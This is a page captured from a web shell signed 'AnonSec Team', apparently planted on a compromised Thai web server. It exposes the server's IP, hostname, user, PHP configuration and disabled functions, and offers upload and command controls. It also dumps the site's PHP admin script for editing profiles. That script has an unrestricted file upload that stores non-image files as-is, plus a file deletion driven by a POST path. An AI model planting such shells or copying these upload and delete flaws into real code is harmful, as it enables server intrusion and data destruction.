NG1NDEX
Server IP : 103.233.192.212  /  Your IP : 3.144.226.114
Web Server : Apache/2
System : Linux sv1.inde.co.th 3.10.0-1160.36.2.el7.x86_64 #1 SMP Wed Jul 21 11:57:15 UTC 2021 x86_64
User : sumpatuan ( 1058)
PHP Version : 5.5.38
Disable Function : symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,putenv,passthru,escapeshellarg,escapeshellcmd,pcntl_exec,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,ini_restore
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sumpatuan/public_html/admin/top/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/sumpatuan/public_html/admin/top/action/save-ChartProfileMain-edit.php
<?php
require_once('session_backend_administrator.php');
header('Content-Type: text/html; charset=UTF-8');
date_default_timezone_set("Asia/Bangkok"); 
$datetime = date('d/m/Y H.i'); 
//// function Transparency BG
function setTransparency($new_image,$image_source){
    $transparencyIndex = imagecolortransparent($image_source);
    $transparencyColor = array('red' => 255, 'green' => 255, 'blue' => 255);
    if ($transparencyIndex >= 0) {
        $transparencyColor    = imagecolorsforindex($image_source, $transparencyIndex);    
    }
    $transparencyIndex    = imagecolorallocate($new_image, $transparencyColor['red'], $transparencyColor['green'], $transparencyColor['blue']);
    imagefill($new_image, 0, 0, $transparencyIndex);
    imagecolortransparent($new_image, $transparencyIndex);

} 
if($STT_login=="admin_login_true"){


    if(!isset($_POST['edt_oldid']) or !isset($_POST['edt_id']) or !isset($_POST['edt_group']) or !isset($_POST['edt_position']) or !isset($_POST['edt_name']) ){
            echo "<SCRIPT type='text/javascript'>
                    alert('กรุณากรอกข้อมูลให้ครบ');
                    window.location.replace(document.referrer);
                </SCRIPT>";
            exit;
    }else{
        $data_oldid = $con_db_administrator->real_escape_string($_POST['edt_oldid']);

        $data_idgroup = $con_db_administrator->real_escape_string($_POST['edt_group']);
        $sql_ng = " SELECT `name_group` FROM `data_group` WHERE `id_group`='$data_idgroup' "; 
        $qr_ng = mysqli_query($con_db_administrator, $sql_ng); 
        $rs_ng = mysqli_fetch_assoc($qr_ng); 
        $data_namegroup = $rs_ng["name_group"];
    
        $data_position = $con_db_administrator->real_escape_string($_POST['edt_position']);
        $data_position_explode = explode('|',$data_position);
        $data_idposition = $data_position_explode[0];
        $data_nameposition = $data_position_explode[1];
    
        $data_id = $con_db_administrator->real_escape_string($_POST['edt_id']);
        $data_name = trim($con_db_administrator->real_escape_string($_POST['edt_name']));
    
        $total_filedoc = $_FILES['uploadFile']['name'];
        $dt_addfile = date('YmdHis'); 
        
        if( $data_id == $data_oldid ){

                /////// UPDATE DATA to SQL
                if($total_filedoc!=""){   
                    $del_filedoc = "../../../".$_POST['edt_pathimg'];
                    @unlink($del_filedoc);

                    $filedoc = $_FILES["uploadFile"]["tmp_name"];
                    $oldname_filedoc = trim($_FILES['uploadFile']['name']);
                    $type_filedoc = pathinfo($_FILES['uploadFile']['name'],PATHINFO_EXTENSION);
                    $newname_filedoc = $dt_addfile."_".$data_name.".".$type_filedoc;
                    $keep_filedoc = "../../../doc/pf/img/";
                    $move_filedoc = $keep_filedoc.$newname_filedoc;
                    $path_filedoc = "doc/pf/img/".$newname_filedoc;
                    $width=300;
                    if( exif_imagetype($filedoc) == IMAGETYPE_JPEG ) {
                        $size=GetimageSize($filedoc);
                        $height=round($width*$size[1]/$size[0]);
                        $filedoc_orig = ImageCreateFromJPEG($filedoc);
                        $photoX = ImagesX($filedoc_orig);
                        $photoY = ImagesY($filedoc_orig);
                        $filedoc_fin = ImageCreateTrueColor($width, $height);
                        setTransparency($filedoc_fin,$filedoc_orig);
                        ImageCopyResampled($filedoc_fin, $filedoc_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY);
                        ImageJPEG($filedoc_fin, $move_filedoc);
                        ImageDestroy($filedoc_orig);
                        ImageDestroy($filedoc_fin);
                    }elseif( exif_imagetype($filedoc) == IMAGETYPE_PNG ){
                        $size=GetimageSize($filedoc);
                        $height=round($width*$size[1]/$size[0]);
                        $filedoc_orig = ImageCreateFromPNG($filedoc);
                        $photoX = ImagesX($filedoc_orig);
                        $photoY = ImagesY($filedoc_orig);
                        $filedoc_fin = ImageCreateTrueColor($width, $height);
                        setTransparency($filedoc_fin,$filedoc_orig);
                        ImageCopyResampled($filedoc_fin, $filedoc_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY);
                        imagepng($filedoc_fin, $move_filedoc);
                        ImageDestroy($filedoc_orig);
                        ImageDestroy($filedoc_fin);
                    }elseif( exif_imagetype($filedoc) == IMAGETYPE_GIF ){
                        $size=GetimageSize($filedoc);
                        $height=round($width*$size[1]/$size[0]);
                        $filedoc_orig = ImageCreateFromGIF($filedoc);
                        $photoX = ImagesX($filedoc_orig);
                        $photoY = ImagesY($filedoc_orig);
                        $filedoc_fin = ImageCreateTrueColor($width, $height);
                        setTransparency($filedoc_fin,$filedoc_orig);
                        ImageCopyResampled($filedoc_fin, $filedoc_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY);
                        imagegif($filedoc_fin,$move_filedoc);
                        ImageDestroy($filedoc_orig);
                        ImageDestroy($filedoc_fin);
                    }else{
                        move_uploaded_file($_FILES['uploadFile']['tmp_name'],$move_filedoc); 
                    }

                    $ud_data = " UPDATE `data_profile` SET `name_profile`='$data_name', `img_profile`='$path_filedoc' , `img_profile`='$path_filedoc'
                                ,`id_position_profile`='$data_idposition',`name_position_profile`='$data_nameposition',`id_group_profile`='$data_idgroup',`name_group_profile`='$data_namegroup'  
                                WHERE `id_profile`='$data_id' ";  
                }else{
                    $ud_data = " UPDATE `data_profile` SET `name_profile`='$data_name',`id_position_profile`='$data_idposition',`name_position_profile`='$data_nameposition',`id_group_profile`='$data_idgroup',`name_group_profile`='$data_namegroup'   WHERE `id_profile`='$data_id' "; 
                }

                $action_ud_data = $con_db_administrator->query($ud_data);
                if(!$action_ud_data){
                    echo "<SCRIPT type='text/javascript'>
                            alert('เกิดข้อผิดพลาด! แก้ไขข้อมูลไม่สำเร็จ');
                            window.location.replace('../ChartProfileMain');
                        </SCRIPT>";
                    exit;
                }else{
                    echo "<SCRIPT type='text/javascript'>
                            alert('แก้ไขข้อมูล [ $data_name ] สำเร็จ');
                            window.location.replace('../ChartProfileMain');
                        </SCRIPT>";
                    exit;
                }

        }else{
            /////// เช็คข้อมูล id ซ้ำ
            $sql_check_id = " SELECT COUNT(*) FROM `data_profile` WHERE `id_profile`='$data_id' ";
            $qr_check_id = mysqli_query($con_db_administrator, $sql_check_id) or trigger_error("sql_check_id", E_USER_ERROR);
            $rs_check_id = mysqli_fetch_row($qr_check_id);
            $check_id = $rs_check_id[0]; 
            if($check_id >= 1){
                echo "<SCRIPT type='text/javascript'>
                        alert('ลำดับบุคลากร [ $data_id ] ซ้ำ');
                        window.location.replace(document.referrer);
                    </SCRIPT>";
                exit;
            }else{

                /////// UPDATE DATA to SQL
                if($total_filedoc!=""){   
                    $del_filedoc = "../../../".$_POST['edt_pathimg'];
                    @unlink($del_filedoc);

                    $filedoc = $_FILES["uploadFile"]["tmp_name"];
                    $oldname_filedoc = trim($_FILES['uploadFile']['name']);
                    $type_filedoc = pathinfo($_FILES['uploadFile']['name'],PATHINFO_EXTENSION);
                    $newname_filedoc = $dt_addfile."_".$data_name.".".$type_filedoc;
                    $keep_filedoc = "../../../doc/pf/img/";
                    $move_filedoc = $keep_filedoc.$newname_filedoc;
                    $path_filedoc = "doc/pf/img/".$newname_filedoc;
                    $width=300;
                    if( exif_imagetype($filedoc) == IMAGETYPE_JPEG ) {
                        $size=GetimageSize($filedoc);
                        $height=round($width*$size[1]/$size[0]);
                        $filedoc_orig = ImageCreateFromJPEG($filedoc);
                        $photoX = ImagesX($filedoc_orig);
                        $photoY = ImagesY($filedoc_orig);
                        $filedoc_fin = ImageCreateTrueColor($width, $height);
                        setTransparency($filedoc_fin,$filedoc_orig);
                        ImageCopyResampled($filedoc_fin, $filedoc_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY);
                        ImageJPEG($filedoc_fin, $move_filedoc);
                        ImageDestroy($filedoc_orig);
                        ImageDestroy($filedoc_fin);
                    }elseif( exif_imagetype($filedoc) == IMAGETYPE_PNG ){
                        $size=GetimageSize($filedoc);
                        $height=round($width*$size[1]/$size[0]);
                        $filedoc_orig = ImageCreateFromPNG($filedoc);
                        $photoX = ImagesX($filedoc_orig);
                        $photoY = ImagesY($filedoc_orig);
                        $filedoc_fin = ImageCreateTrueColor($width, $height);
                        setTransparency($filedoc_fin,$filedoc_orig);
                        ImageCopyResampled($filedoc_fin, $filedoc_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY);
                        imagepng($filedoc_fin, $move_filedoc);
                        ImageDestroy($filedoc_orig);
                        ImageDestroy($filedoc_fin);
                    }elseif( exif_imagetype($filedoc) == IMAGETYPE_GIF ){
                        $size=GetimageSize($filedoc);
                        $height=round($width*$size[1]/$size[0]);
                        $filedoc_orig = ImageCreateFromGIF($filedoc);
                        $photoX = ImagesX($filedoc_orig);
                        $photoY = ImagesY($filedoc_orig);
                        $filedoc_fin = ImageCreateTrueColor($width, $height);
                        setTransparency($filedoc_fin,$filedoc_orig);
                        ImageCopyResampled($filedoc_fin, $filedoc_orig, 0, 0, 0, 0, $width+1, $height+1, $photoX, $photoY);
                        imagegif($filedoc_fin,$move_filedoc);
                        ImageDestroy($filedoc_orig);
                        ImageDestroy($filedoc_fin);
                    }else{
                        move_uploaded_file($_FILES['uploadFile']['tmp_name'],$move_filedoc); 
                    }

                    $ud_data = " UPDATE `data_profile` SET `id_profile`='$data_id', `name_profile`='$data_name', `img_profile`='$path_filedoc' , `img_profile`='$path_filedoc'
                                ,`id_position_profile`='$data_idposition',`name_position_profile`='$data_nameposition',`id_group_profile`='$data_idgroup',`name_group_profile`='$data_namegroup'  
                                WHERE `id_profile`='$data_oldid' ";  
                }else{
                    $ud_data = " UPDATE `data_profile` SET `id_profile`='$data_id', `name_profile`='$data_name',`id_position_profile`='$data_idposition',`name_position_profile`='$data_nameposition',`id_group_profile`='$data_idgroup',`name_group_profile`='$data_namegroup'   WHERE `id_profile`='$data_oldid' "; 
                }
                
                $action_ud_data = $con_db_administrator->query($ud_data);
                if(!$action_ud_data){
                    echo "<SCRIPT type='text/javascript'>
                            alert('เกิดข้อผิดพลาด! แก้ไขข้อมูลไม่สำเร็จ');
                            window.location.replace('../ChartProfileMain');
                        </SCRIPT>";
                    exit;
                }else{
                    echo "<SCRIPT type='text/javascript'>
                            alert('แก้ไขข้อมูล [ $data_name ] สำเร็จ');
                            window.location.replace('../ChartProfileMain');
                        </SCRIPT>";
                    exit;
                }


            }

        }

    }
        
           

}else{
    echo "<SCRIPT type='text/javascript'>
        alert('กรุณาเข้าสู่ระบบ');
        window.location.replace('../../index');
    </SCRIPT>";
    exit;
}
mysqli_close($con_db_administrator);
?>

Anon7 - 2022
AnonSec Team